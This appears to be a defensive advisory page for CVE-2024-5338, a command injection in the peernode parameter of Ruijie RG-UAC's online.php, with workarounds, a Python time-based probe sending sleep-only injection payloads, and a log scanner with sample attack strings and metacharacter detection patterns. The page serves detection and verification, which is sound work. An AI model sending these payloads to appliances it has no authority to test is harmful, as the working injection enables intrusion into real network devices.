CVE-2024-5338
📋 TL;DR
This CVE describes an OS command injection vulnerability, rated critical by VulDB, in the Ruijie RG-UAC Unified Internet Behavior Management Audit System. A request to /view/vpn/autovpn/online.php whose 'peernode' parameter contains shell metacharacters reaches an OS command unsanitized, so an attacker who can reach that page can run arbitrary commands on the appliance. Builds up to 20240516 (the date-stamped version string, i.e. 16 May 2024) are affected; no fixed build is known.
💻 Affected Systems
- Ruijie RG-UAC Unified Internet Behavior Management Audit System
📦 What is this software?
RG-UAC is Ruijie's internet behavior management and audit appliance: a network gateway that logs and controls users' internet activity. The vulnerable code is part of its web management interface, specifically the AutoVPN online-peer page at /view/vpn/autovpn/online.php.
⚠️ Risk & Real-World Impact
Worst Case
Full compromise of the appliance: arbitrary commands run with the privileges of the web server process, which on embedded appliances is often root. Because the RG-UAC is a network audit appliance that handles user traffic and keeps the audit logs, this can lead to data theft, tampering with or deletion of audit records, lateral movement into the networks it fronts, or ransomware deployment.
Likely Case
Remote code execution on the appliance, enabling attackers to install backdoors, exfiltrate sensitive data (including the traffic and user records the system audits), or disrupt network operations.
If Mitigated
Limited impact if the management interface is reachable only from an administrative network, a WAF in front of it rejects anything but a hostname or IP address in the peernode parameter, and access to the endpoint is logged and reviewed. Input validation inside the page itself is the vendor's to fix, not something an operator can add.
🎯 Exploit Status
A proof of concept has been published (the GitHub PDF and the VulDB entry in the references). The reference describes the issue as a backend RCE, i.e. in the management interface, so the attacker most likely needs network reachability to the admin web interface and, depending on the page's access control, an authenticated session; treat claims of unauthenticated exploitation as unconfirmed. The attack is launched remotely over HTTP.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Unknown
Vendor Advisory: None available
Restart Required: No
Instructions:
No official patch available. Vendor was contacted but did not respond. Consider workarounds or system replacement.
🔧 Temporary Workarounds
Web Application Firewall Rule
Block or sanitize requests to /view/vpn/autovpn/online.php whose peernode parameter contains anything other than a hostname or IP address (an allowlist of letters, digits, '.', '-', '_' and ':').
A denylist of ; | & $ ( ) ` and newline (%0a, %0d) in the peernode parameter also catches the obvious payloads, but the WAF must URL-decode the value (including double encoding) before matching, and the rule is a stopgap, not a fix.
Network Access Control
Restrict access to the management interface, or at least to the vulnerable endpoint, using network segmentation or ACLs. On a Linux firewall in the path (or on the appliance itself, if you have shell access) a string match can drop plaintext HTTP requests for the page:
iptables -A INPUT -p tcp --dport [WEB_PORT] -m string --string "/view/vpn/autovpn/online.php" --algo bm -j DROP
Note that this only works for unencrypted HTTP: over HTTPS the path is inside TLS and the string match never fires. The match is also case-sensitive and per-packet, so a request split across TCP segments slips through. Where possible, restrict the whole web port to the administrative network by source address instead.
🧯 If You Can't Patch
- Isolate the Ruijie RG-UAC management interface from the internet and from general user VLANs; allow only an administrative network and named admin accounts to reach it
- The input validation itself lives in the vendor's PHP code, so the controls you own are reachability (segmentation, ACLs, the WAF rule above) and visibility: log every request to the endpoint and review those logs
🔍 How to Verify
Check if Vulnerable:
Send a request to /view/vpn/autovpn/online.php with a peernode value that only delays the response (a sleep command appended after a shell separator) and compare the response time with a baseline request; a delay that tracks the sleep value means the parameter reaches a shell. Use sleep rather than commands that write files or open network connections, and repeat the measurement a few times so one slow response is not misread as a hit.
Check Version:
Check system version through web interface or administrative console. Specific command unavailable in documentation.
Verify Fix Applied:
Verify that command injection attempts via the peernode parameter are blocked or sanitized, and that the endpoint no longer executes arbitrary commands.
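The time-based check described above, as an added example written for this page (it is not the disclosed exploit and not vendor code). Assumptions, all adjustable: the management interface is reachable at the base URL you pass in, online.php reads peernode from the query string, and an authenticated admin session cookie may be required (pass it with --cookie). Only sleep is injected, so a positive result costs DELAY seconds on the appliance and nothing else.

```python
"""Time-based, non-destructive probe for the CVE-2024-5338 peernode injection.

Added example for this page, not the published exploit and not vendor code.
Assumptions: BASE_URL reaches the RG-UAC web interface, online.php takes
`peernode` in the query string, and an admin session cookie may be needed.
"""
from __future__ import annotations

import argparse
import ssl
import statistics
import time
import urllib.parse
import urllib.request

ENDPOINT = "/view/vpn/autovpn/online.php"


def build_payloads(delay: int) -> list[str]:
    """Sleep-only payloads for the common ways a value reaches a shell:
    unquoted (`;`), inside double quotes (`$(...)`), and via a newline."""
    return [
        f"127.0.0.1;sleep {delay};#",
        f"127.0.0.1$(sleep {delay})",
        f"127.0.0.1\nsleep {delay}",
    ]


def is_vulnerable(baseline: list[float], probe: list[float], delay: int) -> bool:
    """Compare medians so a single slow request cannot cause a false positive;
    require most of the injected delay (20% jitter tolerance) to show up."""
    return statistics.median(probe) - statistics.median(baseline) >= 0.8 * delay


def timed_get(base_url: str, peernode: str, cookie: str | None, timeout: float) -> float:
    """Issue one GET with the given peernode value and return elapsed seconds.
    The appliance's self-signed certificate is accepted for this probe only."""
    query = urllib.parse.urlencode({"peernode": peernode})
    url = base_url.rstrip("/") + ENDPOINT + "?" + query
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2024-5338-check"})
    if cookie:
        req.add_header("Cookie", cookie)
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            resp.read()
    except Exception:
        pass  # HTTP errors and timeouts still yield a usable elapsed time
    return time.monotonic() - start


def check(base_url: str, cookie: str | None, delay: int = 5, samples: int = 3) -> dict[str, bool]:
    """Return {payload: vulnerable?} from `samples` baseline and probe requests each.
    An unresponsive host inflates baseline and probe alike, so it does not
    register as vulnerable; the timeout is generous enough to see the sleep."""
    timeout = delay * 3
    baseline = [timed_get(base_url, "127.0.0.1", cookie, timeout) for _ in range(samples)]
    results = {}
    for payload in build_payloads(delay):
        probe = [timed_get(base_url, payload, cookie, timeout) for _ in range(samples)]
        results[payload] = is_vulnerable(baseline, probe, delay)
    return results


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="CVE-2024-5338 time-based check")
    ap.add_argument("base_url", help="e.g. https://192.0.2.10")
    ap.add_argument("--cookie", help="admin session cookie, e.g. 'PHPSESSID=...'")
    ap.add_argument("--delay", type=int, default=5)
    args = ap.parse_args()
    for payload, hit in check(args.base_url, args.cookie, args.delay).items():
        print(f"{'VULNERABLE' if hit else 'no delay  '}  {payload!r}")
```

Run it against a test instance only, with a delay short enough not to disturb the service; the same script, run after a WAF rule or ACL is in place, doubles as the "verify fix applied" check: every payload should then report no delay (or be rejected outright).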
📡 Detection & Monitoring
Log Indicators:
- Requests (GET or POST) to /view/vpn/autovpn/online.php whose peernode parameter contains shell metacharacters, including URL-encoded forms such as %3b, %7c and %24%28
- Unexpected system command execution from web server process
Network Indicators:
- HTTP requests containing OS command injection patterns (;, |, &, $, backtick, etc.) in the peernode parameter, after URL-decoding
- Outbound connections from web server to unexpected destinations
SIEM Query (Splunk-style pseudo-query; adapt the field names to your log source, and match on the URL-decoded peernode value rather than the raw query string, where & separates parameters and would match every multi-parameter request):
source="web_logs" AND url="*online.php*" AND (peernode="*;*" OR peernode="*|*" OR peernode="*&*" OR peernode="*$(*" OR peernode="*`*")
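The log indicators and the SIEM query above, turned into a scan over access-log lines, as an added detection example for this page (not vendor code; the log lines inside are constructed, not captured from a real RG-UAC). It assumes the appliance, or a reverse proxy in front of it, writes combined-format access logs with the query string in the request line. Two things a plain "*;*" match misses are handled: URL-encoding, including double encoding, and an allowlist of what a legitimate peer node (a hostname or IP address) can contain.

```python
"""Access-log scan for CVE-2024-5338 probing of the peernode parameter.

Added detection example for this page; not vendor code. SAMPLE_LOG is
constructed. Assumes combined-format access logs that record the query string.
"""
import re
import urllib.parse

ENDPOINT = "/view/vpn/autovpn/online.php"

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# A peer node is a hostname or IP address; anything else is suspect.
ALLOWED = re.compile(r"^[A-Za-z0-9._:-]*$")
# Shell metacharacters worth naming in the finding.
META = re.compile(r"[;|&$`()\n\r<>]")

# Constructed sample: line 2 is `;id`, line 3 is double-encoded `1$(sleep 5)`,
# line 4 has a `;` on an unrelated page, line 5 is a POST whose body (and
# therefore its peernode value) the access log does not record.
SAMPLE_LOG = """\
10.0.0.5 - - [16/May/2024:10:01:02 +0800] "GET /view/vpn/autovpn/online.php?peernode=10.1.1.1 HTTP/1.1" 200 512
10.0.0.9 - - [16/May/2024:10:03:44 +0800] "GET /view/vpn/autovpn/online.php?peernode=10.1.1.1%3Bid HTTP/1.1" 200 640
10.0.0.9 - - [16/May/2024:10:03:50 +0800] "GET /view/vpn/autovpn/online.php?peernode=1%2524%2528sleep%25205%2529 HTTP/1.1" 200 640
10.0.0.7 - - [16/May/2024:10:05:10 +0800] "GET /view/index.php?q=a;b HTTP/1.1" 200 100
10.0.0.9 - - [16/May/2024:10:06:00 +0800] "POST /view/vpn/autovpn/online.php HTTP/1.1" 200 640
"""


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo repeated percent-encoding; attackers double-encode to slip past
    rules that decode only once."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def extract_peernode(target: str):
    """Return the still-encoded peernode value if `target` is the vulnerable
    page, else None. Splits on '&' by hand so a raw ';' in the value is kept."""
    parts = urllib.parse.urlsplit(target)
    if parts.path != ENDPOINT:
        return None
    for pair in parts.query.split("&"):
        key, _, val = pair.partition("=")
        if urllib.parse.unquote_plus(key) == "peernode":
            return val
    return None


def scan(log_text: str) -> list:
    """One finding per request whose decoded peernode is not a plain host name or address."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        raw = extract_peernode(m["target"])
        if raw is None:
            continue
        decoded = fully_decode(raw)
        if ALLOWED.match(decoded):
            continue
        findings.append({
            "ip": m["ip"], "ts": m["ts"], "method": m["method"],
            "decoded": decoded,
            "metachars": sorted(set(META.findall(decoded))),
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} peernode={f['decoded']!r} metachars={f['metachars']}")
```

The allowlist is the part to keep even if you port this to a SIEM: a peer node never legitimately contains a space, quote or bracket, so flagging everything outside the allowed set catches payloads that avoid the usual ; | & characters. POST bodies are invisible here; if the appliance accepts the parameter in a POST, only a WAF or reverse proxy that logs bodies can give the same coverage.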
🔗 References
- https://github.com/h0e4a0r1t/h0e4a0r1t.github.io/blob/master/2024/z%7CYVDv%7CHKA)*%5CdK!/Ruijie%20RG-UAC%20Unified%20Internet%20Behavior%20Management%20Audit%20System%20Backend%20RCE%20Vulnerability-autovpn%3Aonline.php.pdf
- https://vuldb.com/?ctiid.266244
- https://vuldb.com/?id.266244
- https://vuldb.com/?submit.336036